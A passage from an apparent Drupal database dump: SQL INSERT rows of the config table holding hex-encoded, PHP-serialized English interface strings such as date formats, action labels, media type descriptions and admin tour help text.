('language.en', 'captcha.settings', 0x613a333a7b733a31313a226465736372697074696f6e223b733a3131303a2254686973207175657374696f6e20697320666f722074657374696e672077686574686572206f72206e6f7420796f752061726520612068756d616e2076697369746f7220616e6420746f2070726576656e74206175746f6d61746564207370616d207375626d697373696f6e732e223b733a353a227469746c65223b733a373a2243415054434841223b733a33303a2277726f6e675f636170746368615f726573706f6e73655f6d657373616765223b733a35353a2254686520616e7377657220796f7520656e746572656420666f7220746865204341505443484120776173206e6f7420636f72726563742e223b7d),
('language.en', 'comment.type.comment', 0x613a323a7b733a353a226c6162656c223b733a31363a2244656661756c7420636f6d6d656e7473223b733a31313a226465736372697074696f6e223b733a32383a22416c6c6f777320636f6d6d656e74696e67206f6e20636f6e74656e74223b7d),
('language.en', 'contact.form.feedback', 0x613a323a7b733a353a226c6162656c223b733a31363a225765627369746520666565646261636b223b733a373a226d657373616765223b733a32373a22596f7572206d65737361676520686173206265656e2073656e742e223b7d),
('language.en', 'contact.form.personal', 0x613a323a7b733a353a226c6162656c223b733a32313a22506572736f6e616c20636f6e7461637420666f726d223b733a373a226d657373616765223b733a32373a22596f7572206d65737361676520686173206265656e2073656e742e223b7d),
('language.en', 'core.base_field_override.node.page.promote', 0x613a323a7b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d7d),
('language.en', 'core.date_format.fallback', 0x613a313a7b733a353a226c6162656c223b733a32303a2246616c6c6261636b206461746520666f726d6174223b7d),
('language.en', 'core.date_format.html_date', 0x613a313a7b733a353a226c6162656c223b733a393a2248544d4c2044617465223b7d),
('language.en', 'core.date_format.html_datetime', 0x613a313a7b733a353a226c6162656c223b733a31333a2248544d4c204461746574696d65223b7d),
('language.en', 'core.date_format.html_month', 0x613a313a7b733a353a226c6162656c223b733a31303a2248544d4c204d6f6e7468223b7d),
('language.en', 'core.date_format.html_time', 0x613a313a7b733a353a226c6162656c223b733a393a2248544d4c2054696d65223b7d),
('language.en', 'core.date_format.html_week', 0x613a313a7b733a353a226c6162656c223b733a393a2248544d4c205765656b223b7d),
('language.en', 'core.date_format.html_year', 0x613a313a7b733a353a226c6162656c223b733a393a2248544d4c2059656172223b7d),
('language.en', 'core.date_format.html_yearless_date', 0x613a313a7b733a353a226c6162656c223b733a31383a2248544d4c20596561726c6573732064617465223b7d),
('language.en', 'core.date_format.long', 0x613a323a7b733a353a226c6162656c223b733a31373a2244656661756c74206c6f6e672064617465223b733a373a227061747465726e223b733a31353a226c2c2046206a2c2059202d20483a69223b7d),
('language.en', 'core.date_format.medium', 0x613a323a7b733a353a226c6162656c223b733a31393a2244656661756c74206d656469756d2064617465223b733a373a227061747465726e223b733a31343a22442c206d2f642f59202d20483a69223b7d),
('language.en', 'core.date_format.olivero_medium', 0x613a323a7b733a353a226c6162656c223b733a31343a224f6c697665726f204d656469756d223b733a373a227061747465726e223b733a383a226a2020462c202059223b7d),
('language.en', 'core.date_format.short', 0x613a323a7b733a353a226c6162656c223b733a31383a2244656661756c742073686f72742064617465223b733a373a227061747465726e223b733a31313a226d2f642f59202d20483a69223b7d),
('language.en', 'core.entity_form_mode.media.media_library', 0x613a313a7b733a353a226c6162656c223b733a31333a224d65646961206c696272617279223b7d),
('language.en', 'core.entity_form_mode.user.register', 0x613a313a7b733a353a226c6162656c223b733a383a225265676973746572223b7d),
('language.en', 'core.entity_view_mode.block_content.full', 0x613a313a7b733a353a226c6162656c223b733a343a2246756c6c223b7d),
('language.en', 'core.entity_view_mode.comment.full', 0x613a313a7b733a353a226c6162656c223b733a31323a2246756c6c20636f6d6d656e74223b7d),
('language.en', 'core.entity_view_mode.media.full', 0x613a313a7b733a353a226c6162656c223b733a31323a2246756c6c20636f6e74656e74223b7d),
('language.en', 'core.entity_view_mode.media.media_library', 0x613a313a7b733a353a226c6162656c223b733a31333a224d65646961206c696272617279223b7d),
('language.en', 'core.entity_view_mode.node.full', 0x613a313a7b733a353a226c6162656c223b733a31323a2246756c6c20636f6e74656e74223b7d),
('language.en', 'core.entity_view_mode.node.rss', 0x613a313a7b733a353a226c6162656c223b733a333a22525353223b7d),
('language.en', 'core.entity_view_mode.node.search_index', 0x613a313a7b733a353a226c6162656c223b733a31323a2253656172636820696e646578223b7d),
('language.en', 'core.entity_view_mode.node.search_result', 0x613a313a7b733a353a226c6162656c223b733a33323a2253656172636820726573756c7420686967686c69676874696e6720696e707574223b7d),
('language.en', 'core.entity_view_mode.node.teaser', 0x613a313a7b733a353a226c6162656c223b733a363a22546561736572223b7d),
('language.en', 'core.entity_view_mode.taxonomy_term.full', 0x613a313a7b733a353a226c6162656c223b733a31383a225461786f6e6f6d79207465726d2070616765223b7d),
('language.en', 'core.entity_view_mode.user.compact', 0x613a313a7b733a353a226c6162656c223b733a373a22436f6d70616374223b7d),
('language.en', 'core.entity_view_mode.user.full', 0x613a313a7b733a353a226c6162656c223b733a31323a2255736572206163636f756e74223b7d),
('language.en', 'editor.editor.full_html', 0x613a313a7b733a383a2273657474696e6773223b613a313a7b733a373a22706c7567696e73223b613a313a7b733a31393a22636b656469746f72355f636f6465426c6f636b223b613a313a7b733a393a226c616e677561676573223b613a31343a7b693a303b613a313a7b733a353a226c6162656c223b733a31303a22506c61696e2074657874223b7d693a313b613a313a7b733a353a226c6162656c223b733a313a2243223b7d693a323b613a313a7b733a353a226c6162656c223b733a323a224323223b7d693a333b613a313a7b733a353a226c6162656c223b733a333a22432b2b223b7d693a343b613a313a7b733a353a226c6162656c223b733a333a22435353223b7d693a353b613a313a7b733a353a226c6162656c223b733a343a2244696666223b7d693a363b613a313a7b733a353a226c6162656c223b733a343a2248544d4c223b7d693a373b613a313a7b733a353a226c6162656c223b733a343a224a617661223b7d693a383b613a313a7b733a353a226c6162656c223b733a31303a224a617661536372697074223b7d693a393b613a313a7b733a353a226c6162656c223b733a333a22504850223b7d693a31303b613a313a7b733a353a226c6162656c223b733a363a22507974686f6e223b7d693a31313b613a313a7b733a353a226c6162656c223b733a343a2252756279223b7d693a31323b613a313a7b733a353a226c6162656c223b733a31303a2254797065536372697074223b7d693a31333b613a313a7b733a353a226c6162656c223b733a333a22584d4c223b7d7d7d7d7d7d),
('language.en', 'field.field.block_content.basic.body', 0x613a313a7b733a353a226c6162656c223b733a343a22426f6479223b7d),
('language.en', 'field.field.comment.comment.comment_body', 0x613a313a7b733a353a226c6162656c223b733a373a22436f6d6d656e74223b7d),
('language.en', 'field.field.media.audio.field_media_audio_file', 0x613a313a7b733a353a226c6162656c223b733a31303a22417564696f2066696c65223b7d),
('language.en', 'field.field.media.document.field_media_document', 0x613a313a7b733a353a226c6162656c223b733a383a22446f63756d656e74223b7d),
('language.en', 'field.field.media.image.field_media_image', 0x613a313a7b733a353a226c6162656c223b733a353a22496d616765223b7d),
('language.en', 'field.field.media.remote_video.field_media_oembed_video', 0x613a313a7b733a353a226c6162656c223b733a393a22566964656f2055524c223b7d),
('language.en', 'field.field.media.video.field_media_video_file', 0x613a313a7b733a353a226c6162656c223b733a31303a22566964656f2066696c65223b7d),
('language.en', 'field.field.node.article.body', 0x613a313a7b733a353a226c6162656c223b733a343a22426f6479223b7d),
('language.en', 'field.field.node.article.comment', 0x613a313a7b733a353a226c6162656c223b733a383a22436f6d6d656e7473223b7d),
('language.en', 'field.field.node.article.field_image', 0x613a313a7b733a353a226c6162656c223b733a353a22496d616765223b7d),
('language.en', 'field.field.node.article.field_tags', 0x613a323a7b733a353a226c6162656c223b733a343a2254616773223b733a31313a226465736372697074696f6e223b733a38343a22456e746572206120636f6d6d612d736570617261746564206c6973742e20466f72206578616d706c653a20416d7374657264616d2c204d657869636f20436974792c2022436c6576656c616e642c204f68696f22223b7d),
('language.en', 'field.field.node.page.body', 0x613a313a7b733a353a226c6162656c223b733a343a22426f6479223b7d),
('language.en', 'field.field.user.user.user_picture', 0x613a323a7b733a353a226c6162656c223b733a373a2250696374757265223b733a31313a226465736372697074696f6e223b733a32393a22596f7572207669727475616c2066616365206f7220706963747572652e223b7d),
('language.en', 'filter.format.basic_html', 0x613a313a7b733a343a226e616d65223b733a31303a2242617369632048544d4c223b7d),
('language.en', 'filter.format.full_html', 0x613a313a7b733a343a226e616d65223b733a393a2246756c6c2048544d4c223b7d),
('language.en', 'filter.format.plain_text', 0x613a313a7b733a343a226e616d65223b733a31303a22506c61696e2074657874223b7d),
('language.en', 'filter.format.restricted_html', 0x613a313a7b733a343a226e616d65223b733a31353a22526573747269637465642048544d4c223b7d),
('language.en', 'image.style.large', 0x613a313a7b733a353a226c6162656c223b733a31363a224c617267652028343830c39734383029223b7d),
('language.en', 'image.style.media_library', 0x613a313a7b733a353a226c6162656c223b733a33343a224d65646961204c696272617279207468756d626e61696c2028323230c39732323029223b7d),
('language.en', 'image.style.medium', 0x613a313a7b733a353a226c6162656c223b733a31373a224d656469756d2028323230c39732323029223b7d),
('language.en', 'image.style.thumbnail', 0x613a313a7b733a353a226c6162656c223b733a32303a225468756d626e61696c2028313030c39731303029223b7d),
('language.en', 'image.style.wide', 0x613a313a7b733a353a226c6162656c223b733a31313a225769646520283130393029223b7d),
('language.en', 'language.entity.en', 0x613a313a7b733a353a226c6162656c223b733a373a22456e676c697368223b7d),
('language.en', 'language.entity.und', 0x613a313a7b733a353a226c6162656c223b733a31333a224e6f7420737065636966696564223b7d),
('language.en', 'language.entity.zxx', 0x613a313a7b733a353a226c6162656c223b733a31343a224e6f74206170706c696361626c65223b7d),
('language.en', 'media.type.audio', 0x613a323a7b733a353a226c6162656c223b733a353a22417564696f223b733a31313a226465736372697074696f6e223b733a32383a2241206c6f63616c6c7920686f7374656420617564696f2066696c652e223b7d),
('language.en', 'media.type.document', 0x613a323a7b733a353a226c6162656c223b733a383a22446f63756d656e74223b733a31313a226465736372697074696f6e223b733a34343a22416e2075706c6f616465642066696c65206f7220646f63756d656e742c20737563682061732061205044462e223b7d),
('language.en', 'media.type.image', 0x613a323a7b733a353a226c6162656c223b733a353a22496d616765223b733a31313a226465736372697074696f6e223b733a33363a22557365206c6f63616c20696d6167657320666f72207265757361626c65206d656469612e223b7d),
('language.en', 'media.type.remote_video', 0x613a323a7b733a353a226c6162656c223b733a31323a2252656d6f746520766964656f223b733a31313a226465736372697074696f6e223b733a34363a22412072656d6f74656c7920686f7374656420766964656f2066726f6d20596f7554756265206f722056696d656f2e223b7d),
('language.en', 'media.type.video', 0x613a323a7b733a353a226c6162656c223b733a353a22566964656f223b733a31313a226465736372697074696f6e223b733a32383a2241206c6f63616c6c7920686f7374656420766964656f2066696c652e223b7d),
('language.en', 'node.type.article', 0x613a323a7b733a343a226e616d65223b733a373a2241727469636c65223b733a31313a226465736372697074696f6e223b733a38393a22557365203c656d3e61727469636c65733c2f656d3e20666f722074696d652d73656e73697469766520636f6e74656e74206c696b65206e6577732c2070726573732072656c6561736573206f7220626c6f6720706f7374732e223b7d),
('language.en', 'node.type.page', 0x613a323a7b733a343a226e616d65223b733a31303a2242617369632070616765223b733a31313a226465736372697074696f6e223b733a37373a22557365203c656d3e62617369632070616765733c2f656d3e20666f7220796f75722073746174696320636f6e74656e742c207375636820617320616e202741626f75742075732720706167652e223b7d),
('language.en', 'search.page.node_search', 0x613a313a7b733a353a226c6162656c223b733a373a22436f6e74656e74223b7d),
('language.en', 'search.page.user_search', 0x613a313a7b733a353a226c6162656c223b733a353a225573657273223b7d),
('language.en', 'shortcut.set.default', 0x613a313a7b733a353a226c6162656c223b733a373a2244656661756c74223b7d),
('language.en', 'system.action.comment_delete_action', 0x613a313a7b733a353a226c6162656c223b733a31343a2244656c65746520636f6d6d656e74223b7d),
('language.en', 'system.action.comment_publish_action', 0x613a313a7b733a353a226c6162656c223b733a31353a225075626c69736820636f6d6d656e74223b7d),
('language.en', 'system.action.comment_save_action', 0x613a313a7b733a353a226c6162656c223b733a31323a225361766520636f6d6d656e74223b7d),
('language.en', 'system.action.comment_unpublish_action', 0x613a313a7b733a353a226c6162656c223b733a31373a22556e7075626c69736820636f6d6d656e74223b7d),
('language.en', 'system.action.media_delete_action', 0x613a313a7b733a353a226c6162656c223b733a31323a2244656c657465206d65646961223b7d),
('language.en', 'system.action.media_publish_action', 0x613a313a7b733a353a226c6162656c223b733a31333a225075626c697368206d65646961223b7d),
('language.en', 'system.action.media_save_action', 0x613a313a7b733a353a226c6162656c223b733a31303a2253617665206d65646961223b7d),
('language.en', 'system.action.media_unpublish_action', 0x613a313a7b733a353a226c6162656c223b733a31353a22556e7075626c697368206d65646961223b7d),
('language.en', 'system.action.node_delete_action', 0x613a313a7b733a353a226c6162656c223b733a31343a2244656c65746520636f6e74656e74223b7d),
('language.en', 'system.action.node_make_sticky_action', 0x613a313a7b733a353a226c6162656c223b733a31393a224d616b6520636f6e74656e7420737469636b79223b7d),
('language.en', 'system.action.node_make_unsticky_action', 0x613a313a7b733a353a226c6162656c223b733a32313a224d616b6520636f6e74656e7420756e737469636b79223b7d),
('language.en', 'system.action.node_promote_action', 0x613a313a7b733a353a226c6162656c223b733a32393a2250726f6d6f746520636f6e74656e7420746f2066726f6e742070616765223b7d),
('language.en', 'system.action.node_publish_action', 0x613a313a7b733a353a226c6162656c223b733a31353a225075626c69736820636f6e74656e74223b7d),
('language.en', 'system.action.node_save_action', 0x613a313a7b733a353a226c6162656c223b733a31323a225361766520636f6e74656e74223b7d),
('language.en', 'system.action.node_unpromote_action', 0x613a313a7b733a353a226c6162656c223b733a33303a2252656d6f766520636f6e74656e742066726f6d2066726f6e742070616765223b7d),
('language.en', 'system.action.node_unpublish_action', 0x613a313a7b733a353a226c6162656c223b733a31373a22556e7075626c69736820636f6e74656e74223b7d),
('language.en', 'system.action.pathauto_update_alias_node', 0x613a313a7b733a353a226c6162656c223b733a31363a225570646174652055524c20616c696173223b7d),
('language.en', 'system.action.pathauto_update_alias_user', 0x613a313a7b733a353a226c6162656c223b733a31363a225570646174652055524c20616c696173223b7d),
('language.en', 'system.action.taxonomy_term_publish_action', 0x613a313a7b733a353a226c6162656c223b733a32313a225075626c697368207461786f6e6f6d79207465726d223b7d),
('language.en', 'system.action.taxonomy_term_unpublish_action', 0x613a313a7b733a353a226c6162656c223b733a32333a22556e7075626c697368207461786f6e6f6d79207465726d223b7d),
('language.en', 'system.action.user_block_user_action', 0x613a313a7b733a353a226c6162656c223b733a32363a22426c6f636b207468652073656c65637465642075736572287329223b7d),
('language.en', 'system.action.user_cancel_user_action', 0x613a313a7b733a353a226c6162656c223b733a33353a2243616e63656c207468652073656c65637465642075736572206163636f756e74287329223b7d),
('language.en', 'system.action.user_unblock_user_action', 0x613a313a7b733a353a226c6162656c223b733a32383a22556e626c6f636b207468652073656c65637465642075736572287329223b7d),
('language.en', 'system.maintenance', 0x613a313a7b733a373a226d657373616765223b733a39333a2240736974652069732063757272656e746c7920756e646572206d61696e74656e616e63652e2057652073686f756c64206265206261636b2073686f72746c792e205468616e6b20796f7520666f7220796f75722070617469656e63652e223b7d),
('language.en', 'system.menu.account', 0x613a323a7b733a353a226c6162656c223b733a31373a2255736572206163636f756e74206d656e75223b733a31313a226465736372697074696f6e223b733a34303a224c696e6b732072656c6174656420746f20746865206163746976652075736572206163636f756e74223b7d),
('language.en', 'system.menu.admin', 0x613a323a7b733a353a226c6162656c223b733a31343a2241646d696e697374726174696f6e223b733a31313a226465736372697074696f6e223b733a32353a2241646d696e697374726174697665207461736b206c696e6b73223b7d),
('language.en', 'system.menu.footer', 0x613a323a7b733a353a226c6162656c223b733a363a22466f6f746572223b733a31313a226465736372697074696f6e223b733a32323a225369746520696e666f726d6174696f6e206c696e6b73223b7d),
('language.en', 'system.menu.main', 0x613a323a7b733a353a226c6162656c223b733a31353a224d61696e206e617669676174696f6e223b733a31313a226465736372697074696f6e223b733a31383a22536974652073656374696f6e206c696e6b73223b7d),
('language.en', 'system.menu.tools', 0x613a323a7b733a353a226c6162656c223b733a353a22546f6f6c73223b733a31313a226465736372697074696f6e223b733a33393a225573657220746f6f6c206c696e6b732c206f6674656e206164646564206279206d6f64756c6573223b7d),
('language.en', 'taxonomy.vocabulary.tags', 0x613a323a7b733a343a226e616d65223b733a343a2254616773223b733a31313a226465736372697074696f6e223b733a36313a22557365207461677320746f2067726f75702061727469636c6573206f6e2073696d696c617220746f7069637320696e746f2063617465676f726965732e223b7d),
('language.en', 'tour.tour.block-layout', 0x613a323a7b733a353a226c6162656c223b733a31373a22426c6f636b204c61796f75742050616765223b733a343a2274697073223b613a343a7b733a31323a22626c6f636b2d6c61796f7574223b613a323a7b733a353a226c6162656c223b733a31323a22426c6f636b204c61796f7574223b733a343a22626f6479223b733a3135303a22426c6f636b732061726520626f786573206f6620636f6e74656e742072656e646572656420696e746f20616e20617265612c206f7220726567696f6e2c206f66206120776562207061676520746861742063616e20626520646973706c6179656420696e20726567696f6e7320287375636820617320666f6f746572206f72207369646562617229206f6e20796f757220706167652e223b7d733a31313a22706c6163652d626c6f636b223b613a323a7b733a353a226c6162656c223b733a31323a22506c61636520426c6f636b73223b733a343a22626f6479223b733a3136333a22416e7920637573746f6d206f7220636f6e747269627574656420626c6f636b2063616e20626520616464656420746f206120706172746963756c617220726567696f6e20627920636c69636b696e67206f6e206120627574746f6e20506c61636520626c6f636b2e2041206e657720626c6f636b2063616e20616c736f206265206372656174656420627920636c69636b696e67206f6e20506c61636520426c6f636b223b7d733a31323a22626c6f636b2d726567696f6e223b613a323a7b733a353a226c6162656c223b733a31323a22426c6f636b20526567696f6e223b733a343a22626f6479223b733a3135313a2241737369676e206f72206368616e67652074686520726567696f6e206f66206120626c6f636b20627920636c69636b696e6720686572652e20412064726f70646f776e206c697374207769746820616c6c2074686520726567696f6e732077696c6c206170706561722e20596f752063616e20706c616365206f6e6520626c6f636b20696e206d756c7469706c6520726567696f6e732e223b7d733a31353a22636f6e6669677572652d626c6f636b223b613a323a7b733a353a226c6162656c223b733a31353a22436f6e66696775726520426c6f636b223b733a343a22626f6479223b733a3137333a22427920436c69636b696e67206f6e2022436f6e6669677572652220796f752063616e20676f20616865616420616e6420656469742074686520636f6e74656e7473206f662074686520626c6f636b2c206465616c207769746820746865207669736962696c6974792073657474696e677320616e64206576656e206368616e67652074686520706c6163656d656e74206f66207768657265206974206973206f6e20796f7572207468656d652e223b7d7d7d),
('language.en', 'tour.tour.language', 0x613a323a7b733a353a226c6162656c223b733a383a224c616e6775616765223b733a343a2274697073223b613a363a7b733a31373a226c616e67756167652d6f76657276696577223b613a323a7b733a353a226c6162656c223b733a393a224c616e677561676573223b733a343a22626f6479223b733a39363a223c703e54686520224c616e67756167657322207061676520616c6c6f777320796f7520746f206164642c20656469742c2064656c6574652c20616e642072656f72646572206c616e67756167657320666f722074686520736974652e3c2f703e223b7d733a31323a226c616e67756167652d616464223b613a323a7b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a343a22626f6479223b733a3137313a223c703e546f20616464206d6f7265206c616e67756167657320746f20796f757220736974652c20636c69636b207468652022416464206c616e67756167652220627574746f6e2e3c2f703e3c703e4164646564206c616e6775616765732077696c6c20626520646973706c6179656420696e20746865206c616e6775616765206c69737420616e642063616e207468656e20626520656469746564206f722064656c657465642e3c2f703e223b7d733a31363a226c616e67756167652d72656f72646572223b613a323a7b733a353a226c6162656c223b733a32303a2252656f72646572696e67206c616e677561676573223b733a343a22626f6479223b733a3430323a223c703e546f2072656f7264657220746865206c616e677561676573206f6e20796f757220736974652c207573652074686520647261672069636f6e73206e65787420746f2065616368206c616e67756167652e3c2f703e3c703e546865206f726465722073686f776e20686572652069732074686520646973706c6179206f7264657220666f72206c616e6775616765206c69737473206f6e207468652073697465207375636820617320696e20746865206c616e677561676520737769746368657220626c6f636b732070726f76696465642062792074686520496e74657266616365205472616e736c6174696f6e20616e6420436f6e74656e74205472616e736c6174696f6e206d6f64756c65732e3c2f703e3c703e5768656e20796f752061726520646f6e6520776974682072656f72646572696e6720746865206c616e6775616765732c20636c69636b2074686520225361766520636f6e66696775726174696f6e2220627574746f6e20666f7220746865206368616e67657320746f2074616b65206566666563742e3c2f703e223b7d733a31363a226c616e67756167652d64656661756c74223b613a323a7b733a353a226c6162656c223b733a32353a225365742061206c616e67756167652061732064656661756c74223b733a343a22626f6479223b733a3237343a223c703e596f752063616e206368616e6765207468652064656661756c74206c616e6775616765206f662074686520736974652062792063686f6f73696e67206f6e65206f6620796f757220636f6e66696775726564206c616e6775616765732061732064656661756c742e2054686520736974652077696c6c20757365207468652064656661756c74206c616e677561676520696e20736974756174696f6e73207768657265206e6f2063686f696365206973206d616465206275742061206c616e67756167652073686f756c64206265207365742c20666f72206578616d706c6520617320746865206c616e6775616765206f662074686520646973706c6179656420696e746572666163652e3c2f703e223b7d733a31393a226c616e67756167652d6f7065726174696f6e73223b613a323a7b733a353a226c6162656c223b733a31393a224d6f64696679696e67206c616e677561676573223b733a343a22626f6479223b733a3339393a223c703e4f7065726174696f6e73206172652070726f766964656420666f722065646974696e6720616e642064656c6574696e6720796f7572206c616e6775616765732e3c2f703e3c703e596f752063616e206564697420746865206e616d6520616e642074686520646972656374696f6e206f6620746865206c616e67756167652e3c2f703e3c703e44656c65746564206c616e6775616765732063616e206265206164646564206261636b2061742061206c617465722074696d652e2044656c6574696e672061206c616e67756167652077696c6c2072656d6f766520616c6c20696e74657266616365207472616e736c6174696f6e73206173736f63696174656420776974682069742c20616e6420636f6e74656e7420696e2074686973206c616e67756167652077696c6c2062652073657420746f206265206c616e6775616765206e65757472616c2e204e6f7465207468617420796f752063616e6e6f742064656c657465207468652064656661756c74206c616e6775616765206f662074686520736974652e3c2f703e223b7d733a31373a226c616e67756167652d636f6e74696e7565223b613a323a7b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a343a22626f6479223b733a3236303a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f662074686520224c616e6775616765732220706167652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f616464223e416464696e672061206c616e67756167653c2f613e3c2f6c693e3c6c693e52656f72646572696e67206c616e6775616765733c2f6c693e3c6c693e45646974696e672061206c616e67756167653c2f6c693e3c6c693e44656c6574696e672061206c616e67756167653c2f6c693e3c2f756c3e3c2f703e223b7d7d7d),
('language.en', 'tour.tour.language-add', 0x613a323a7b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a343a2274697073223b613a333a7b733a32313a226c616e67756167652d6164642d6f76657276696577223b613a323a7b733a353a226c6162656c223b733a31363a22416464696e67206c616e677561676573223b733a343a22626f6479223b733a3135343a223c703e5468697320706167652070726f766964657320746865206162696c69747920746f2061646420636f6d6d6f6e206c616e67756167657320746f20796f757220736974652e3c2f703e3c703e4966207468652064657369726564206c616e6775616765206973206e6f7420617661696c61626c652c20796f752063616e20616464206120637573746f6d206c616e67756167652e3c2f703e223b7d733a31393a226c616e67756167652d6164642d63686f6f7365223b613a323a7b733a353a226c6162656c223b733a31353a2253656c656374206c616e6775616765223b733a343a22626f6479223b733a3331323a223c703e43686f6f73652061206c616e67756167652066726f6d20746865206c6973742c206f722063686f6f73652022437573746f6d206c616e67756167652e2e2e222061742074686520656e64206f6620746865206c6973742e3c2f703e3c703e436c69636b207468652022416464206c616e67756167652220627574746f6e207768656e20796f752061726520646f6e652063686f6f73696e6720796f7572206c616e67756167652e3c2f703e3c703e5768656e20616464696e67206120637573746f6d206c616e67756167652c20796f752077696c6c2067657420616e206164646974696f6e616c20666f726d20776865726520796f752063616e2070726f7669646520746865206e616d652c20636f64652c20616e6420646972656374696f6e206f6620746865206c616e67756167652e3c2f703e223b7d733a32313a226c616e67756167652d6164642d636f6e74696e7565223b613a323a7b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a343a22626f6479223b733a3234393a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f66207468652022416464206c616e6775616765732220666561747572652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e416464696e672061206c616e67756167653c2f6c693e3c6c693e416464696e67206120637573746f6d206c616e67756167653c2f6c693e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e56696577696e6720636f6e66696775726564206c616e6775616765733c2f613e3c2f6c693e3c2f756c3e3c2f703e223b7d7d7d),
('language.en', 'tour.tour.language-edit', 0x613a323a7b733a353a226c6162656c223b733a31373a2245646974696e67206c616e677561676573223b733a343a2274697073223b613a353a7b733a32323a226c616e67756167652d656469742d6f76657276696577223b613a323a7b733a353a226c6162656c223b733a31373a2245646974696e67206c616e677561676573223b733a343a22626f6479223b733a39383a223c703e5468697320706167652070726f766964657320746865206162696c69747920746f20656469742061206c616e6775616765206f6e20796f757220736974652c20696e636c7564696e6720637573746f6d206c616e6775616765732e3c2f703e223b7d733a32323a226c616e67756167652d656469742d6c616e67636f6465223b613a323a7b733a353a226c6162656c223b733a31333a224c616e677561676520636f6465223b733a343a22626f6479223b733a3132323a223c703e596f752063616e6e6f74206368616e67652074686520636f6465206f662061206c616e6775616765206f6e2074686520736974652c2073696e63652069742069732075736564206279207468652073797374656d20746f206b65657020747261636b206f6620746865206c616e67756167652e3c2f703e223b7d733a31393a226c616e67756167652d656469742d6c6162656c223b613a323a7b733a353a226c6162656c223b733a31333a224c616e6775616765206e616d65223b733a343a22626f6479223b733a3238393a223c703e546865206c616e6775616765206e616d652069732075736564207468726f7567686f757420746865207369746520666f7220616c6c20757365727320616e64206973207772697474656e20696e20456e676c6973682e204e616d6573206f66206275696c742d696e206c616e6775616765732063616e206265207472616e736c61746564207573696e672074686520496e74657266616365205472616e736c6174696f6e206d6f64756c652c20616e64206e616d6573206f6620626f7468206275696c742d696e20616e6420637573746f6d206c616e6775616765732063616e206265207472616e736c61746564207573696e672074686520436f6e66696775726174696f6e205472616e736c6174696f6e206d6f64756c652e3c2f703e223b7d733a32333a226c616e67756167652d656469742d646972656374696f6e223b613a323a7b733a353a226c6162656c223b733a31383a224c616e677561676520646972656374696f6e223b733a343a22626f6479223b733a3139363a223c703e43686f6f736520696620746865206c616e6775616765206973206120224c65667420746f20726967687422206f722022526967687420746f206c65667422206c616e67756167652e3c2f703e3c703e4e6f74652074686174206e6f7420616c6c207468656d657320737570706f72742022526967687420746f206c65667422206c61796f7574732c20736f207465737420796f7572207468656d6520696620796f7520617265207573696e672022526967687420746f206c656674222e3c2f703e223b7d733a32323a226c616e67756167652d656469742d636f6e74696e7565223b613a323a7b733a353a226c6162656c223b733a31333a22436f6e74696e75696e67206f6e223b733a343a22626f6479223b733a3231373a223c703e4e6f77207468617420796f75206861766520616e206f76657276696577206f6620746865202245646974206c616e67756167652220666561747572652c20796f752063616e20636f6e74696e75652062793a3c756c3e3c6c693e45646974696e672061206c616e67756167653c2f6c693e3c6c693e3c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e56696577696e6720636f6e66696775726564206c616e6775616765733c2f613e3c2f6c693e3c2f756c3e3c2f703e223b7d7d7d);
INSERT INTO `config` (`collection`, `name`, `data`) VALUES
('language.en', 'tour.tour.locale', 0x613a323a7b733a353a226c6162656c223b733a31313a225472616e736c6174696f6e223b733a343a2274697073223b613a383a7b733a31353a226c6f63616c652d6f76657276696577223b613a323a7b733a353a226c6162656c223b733a32363a225573657220696e74657266616365207472616e736c6174696f6e223b733a343a22626f6479223b733a3238303a2254686973207061676520616c6c6f777320796f7520746f207472616e736c61746520746865207573657220696e74657266616365206f72206d6f64696679206578697374696e67207472616e736c6174696f6e732e20496620796f75206861766520696e7374616c6c656420796f7572207369746520696e697469616c6c7920696e20456e676c6973682c20796f75206d7573742066697273742061646420616e6f74686572206c616e6775616765206f6e20746865203c6120687265663d225b736974653a75726c5d61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223e4c616e67756167657320706167653c2f613e2c20696e206f7264657220746f20757365207468697320706167652e223b7d733a31353a226c6f63616c652d6c616e6775616765223b613a323a7b733a353a226c6162656c223b733a32303a225472616e736c6174696f6e206c616e6775616765223b733a343a22626f6479223b733a34323a2243686f6f736520746865206c616e677561676520796f752077616e7420746f207472616e736c6174652e223b7d733a31333a226c6f63616c652d736561726368223b613a323a7b733a353a226c6162656c223b733a363a22536561726368223b733a343a22626f6479223b733a3130303a22456e7465722074686520737065636966696320776f7264206f722073656e74656e636520796f752077616e7420746f207472616e736c6174652c20796f752063616e20616c736f207772697465206a75737420612070617274206f66206120776f72642e223b7d733a31333a226c6f63616c652d66696c746572223b613a323a7b733a353a226c6162656c223b733a31373a2246696c7465722074686520736561726368223b733a343a22626f6479223b733a3230323a22596f752063616e2073656172636820666f7220756e7472616e736c6174656420737472696e677320696620796f752077616e7420746f207472616e736c61746520736f6d657468696e6720746861742069736e2774207472616e736c61746564207965742e20496620796f752077616e7420746f206d6f6469667920616e206578697374696e67207472616e736c6174696f6e2c20796f75206d696768742077616e7420746f20736561726368206f6e6c7920666f72207472616e736c6174656420737472696e67732e223b7d733a31333a226c6f63616c652d7375626d6974223b613a323a7b733a353a226c6162656c223b733a32363a224170706c7920796f757220736561726368206372697465726961223b733a343a22626f6479223b733a36373a22546f206170706c7920796f7572207365617263682063726974657269612c20636c69636b206f6e20746865203c656d3e46696c7465723c2f656d3e20627574746f6e2e223b7d733a31363a226c6f63616c652d7472616e736c617465223b613a323a7b733a353a226c6162656c223b733a393a225472616e736c617465223b733a343a22626f6479223b733a3138303a22596f752063616e20777269746520796f7572206f776e207472616e736c6174696f6e20696e207468652074657874206669656c6473206f662074686520726967687420636f6c756d